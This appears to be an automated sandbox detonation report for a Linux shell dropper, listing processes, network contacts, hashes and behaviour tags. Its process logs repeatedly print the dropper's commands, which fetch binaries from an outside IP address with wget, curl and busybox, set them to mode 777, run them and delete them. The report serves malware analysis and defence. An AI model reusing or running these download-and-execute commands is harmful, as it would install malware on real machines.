File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A

Processes

/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/chmod

[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV

[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/rm

[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/wget

[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/chmod

[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783

[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/rm

[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/wget

[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/chmod

[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17

[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/rm

[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/wget

[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/chmod

[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF

[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/rm

[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/wget

[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/chmod

[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug

[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/rm

[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/wget

[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/chmod

[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF

[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/rm

[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/wget

[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/chmod

[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug

[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/rm

[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/chmod

[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV

[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/rm

[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/wget

[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/chmod

[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783

[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/rm

[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/wget

[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/chmod

[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17

[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/rm

[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp

Files

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 02:45

Reported

2024-11-20 02:48

Platform

debian9-armhf-20240611-en

Max time kernel

30s

Max time network

34s

Command Line

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A

Processes

/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

